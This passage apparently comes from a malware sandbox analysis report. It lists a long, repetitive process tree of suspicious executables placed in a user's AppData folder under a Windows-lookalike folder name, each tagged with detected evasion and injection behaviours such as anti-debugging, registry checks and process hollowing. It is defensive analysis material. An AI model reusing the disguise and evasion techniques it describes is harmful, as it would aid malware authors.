- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks BIOS information in registry

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks whether UAC is enabled

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks BIOS information in registry

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\jjehjsa 2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Roaming\iuehjsa 2⤵
- Suspicious use of SetThreadContext

  C:\Users\Admin\AppData\Roaming\iuehjsa 3⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks BIOS information in registry

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks whether UAC is enabled

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks whether UAC is enabled

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\iuehjsa 2⤵
- Suspicious use of SetThreadContext

  C:\Users\Admin\AppData\Roaming\iuehjsa 3⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Roaming\jjehjsa 2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks BIOS information in registry

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks whether UAC is enabled

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks BIOS information in registry

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks BIOS information in registry

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks whether UAC is enabled

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\jjehjsa 2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Roaming\iuehjsa 2⤵
- Suspicious use of SetThreadContext

  C:\Users\Admin\AppData\Roaming\iuehjsa 3⤵
  - Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks whether UAC is enabled

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks whether UAC is enabled

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\iuehjsa 2⤵
- Suspicious use of SetThreadContext

  C:\Users\Admin\AppData\Roaming\iuehjsa 3⤵
  - Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Roaming\jjehjsa 2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks whether UAC is enabled

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
- Checks whether UAC is enabled

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe 2⤵
